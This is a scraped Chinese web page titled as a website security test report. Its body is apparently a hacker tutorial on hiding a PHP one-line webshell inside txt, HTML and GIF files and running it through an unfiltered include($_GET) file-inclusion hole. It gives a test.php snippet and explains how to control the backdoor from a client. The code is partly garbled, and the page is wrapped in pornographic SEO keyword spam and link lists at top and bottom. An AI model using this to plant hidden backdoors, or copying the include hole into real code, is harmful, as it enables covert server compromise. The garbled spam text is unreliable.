<wbr id="ede8e"></wbr><bdo id="ede8e"><var id="ede8e"><optgroup id="ede8e"></optgroup></var></bdo>
    1. <sub id="ede8e"></sub>
    2. <sub id="ede8e"></sub>
    3. 18禁无遮挡啪啪无码网站,真人无码作爱免费视频,2018年亚洲欧美在线v,国产成人午夜一区二区三区 ,亚洲精品毛片一区二区,国产在线亚州精品内射,精品无码国产污污污免费,国内少妇人妻偷人精品

      網(wǎng)站安全測(cè)試報(bào)告

      前言:本站為你精心整理了網(wǎng)站安全測(cè)試報(bào)告范文,希望能為你的創(chuàng)作提供參考價(jià)值,我們的客服老師可以幫助你提供個(gè)性化的參考范文,歡迎咨詢。

      網(wǎng)站安全測(cè)試報(bào)告

      最近很多朋友都在問我是否能把我那一句話木馬隱藏到HTML或圖片里,其實(shí)把一句話木馬插入到PHP文件中就已經(jīng)很隱蔽了,如果說硬是要放到HTML文件或圖片里,就接著往下看這篇的篇測(cè)試報(bào)告吧。要知道如果光把PHP語句放到圖片里是無論如何也不能執(zhí)行的,因?yàn)镻HP只解析擴(kuò)展名為php的文件。所以說要能使隱藏在圖片里的PHP語句執(zhí)行。我們就的借助PHP中的調(diào)用函數(shù):include、require等。

      我們還記得前些日子把木馬隱藏到圖片的文章吧。也就是在PHP文件里用include("x.gif")這樣的語句來調(diào)用隱藏在圖片的木馬語句。ASP中語句也類似。看似非常隱蔽但直接調(diào)用圖片對(duì)稍微懂點(diǎn)PHP的人就不難發(fā)現(xiàn)可疑之處。由于URL里用GET方式很難傳遞參數(shù),這就使得插入木馬的性能得不到發(fā)揮。

      Include函數(shù)在PHP中使用的比較頻繁,所以引起的安全問題也實(shí)在太多,例如PHPWIND1.36的漏洞就是因?yàn)閕nclude后面的變量沒做過濾引起的。由此我們就可以構(gòu)造類似的語句來插入到PHP文件中。然后把木馬隱藏到圖片或HTML文件里,可以說隱蔽性就更高了。如在PHPWIND論壇里插入下面的語句:<‘’?@includeinclud/.$PHPWIND_ROOT;?>一般管理員是無法看出來的。

      有了include函數(shù)來輔助幫忙我們就可以把PHP木馬隱藏到諸如txt、html和圖片文件等很多類型的文件里來了。因?yàn)閠xt、html和圖片文件這三種類型的文件最無論在論壇還是文章系統(tǒng)里是最為常見的了,下面我們就依次來做測(cè)試。

      首先建立一PHP文件test.php文件內(nèi)容為:

      $test=$_GET[''''test''''];

      @include''''test/''''.$test;

      ?>

      Txt文件一般都是說明文件,所以我們把一句話木馬放到目錄的說明文件里就OK了。隨便建立一個(gè)TXT文件t.txt。我們把一句話木馬粘貼到t.txt文件里。然后訪問localhost/test/test.php?test=../t.txt如果你看到t.txt的內(nèi)容就證明Ok了,然后把在lanker微型PHP后門客戶端木馬地址添入localhost/test/test.php?test=../t.txt密碼里添入cmd就可以了,執(zhí)行返回的結(jié)果都可以看到。

      對(duì)于HTML的文件,一般都為模版文件。為了使插入到HTML的文件的木馬能被調(diào)用執(zhí)行而且不被顯示出來,我們可以在HTML里加入一個(gè)隱藏屬性的文本框,如:然后使用方法同上。執(zhí)行的返回結(jié)果一般都可以查看源文件看到。如使用查看本程序目錄功能。查看源文件內(nèi)容為我可以得到目錄為C:\Uniserver2_7s\www\test。

      下面我們說說圖片文件,要說最為毒的一招莫過于把木馬隱藏到圖片里。我們可以直接對(duì)一個(gè)圖片進(jìn)行編輯,把插入到圖片末尾

      經(jīng)測(cè)試一般都不會(huì)對(duì)圖片造成影響。然后同樣方法客戶端木馬地址添入

      我們查看PHP環(huán)境變量返回的是結(jié)果是原圖片。

      這里可能要和我們想象的結(jié)果有些差距了,其實(shí)命令已經(jīng)運(yùn)行了,只是返回的結(jié)果看不到而已,因?yàn)檫@是真正的GIF文件,所以是不會(huì)顯示返回結(jié)果的,為了證明是否真的執(zhí)行了命令我們執(zhí)行上傳文件命令。果不出所料,文件已經(jīng)成功上傳到服務(wù)器上。這樣偽造的優(yōu)點(diǎn)是隱蔽性好。缺點(diǎn)也自然不用說了是沒回顯。如果你想看到返回的結(jié)果,那就拿出記事本偽造一個(gè)假的圖片文件吧。

      到這里就基本測(cè)試完了,怎樣隱蔽PHP后門就看你自己的選擇了。行文倉(cāng)促,如有不妥之處,請(qǐng)指出!

      主站蜘蛛池模板: 国产自产对白一区| 五月综合网亚洲乱妇久久| 成人做受视频试看60秒| 黄色A级国产免费大片视频| 国内精品自产拍在线播放| 国产农村老熟女乱子综合| 午夜福利yw在线观看2020| 激情综合网五月婷婷| 中文精品无码中文字幕无码专区| 白色丝袜国产在线视频| 国产成人高清精品亚洲| 亚洲天堂av日韩精品| 日韩中文字幕国产精品| 国产午夜A理论毛片| 国产精品 第一页第二页| 99久久精品一区二区国产| 一个色综合色综合色综合| 亚洲gv天堂无码男同在线观看| 色偷偷女人的天堂亚洲网| 免费A级毛片无码A∨蜜芽试看| 国产免费无遮挡吸乳视频在线观看| 免费播放一区二区三区| 国产精品久久久尹人香蕉| 国产成人精品视频不卡| 99久久er热在这里只有精品99| 狠狠综合久久av一区二| 116美女极品a级毛片| 亚洲高清WWW色好看美女| 精品日韩精品国产另类专区| 亚洲精品人成网线在播放VA| 国产热A欧美热A在线视频| 久久三级中文欧大战字幕| 亚洲成精品动漫久久精久| 国产午夜精品在人线播放| 久久夜色国产噜噜亚洲av| 国产剧情91精品蜜臀一区| 92国产精品午夜福利免费| 91亚洲国产成人久久精| 国产精品小粉嫩在线观看| 精品一区二区久久久久久久网站| 国产一区二区亚洲一区二区三区 |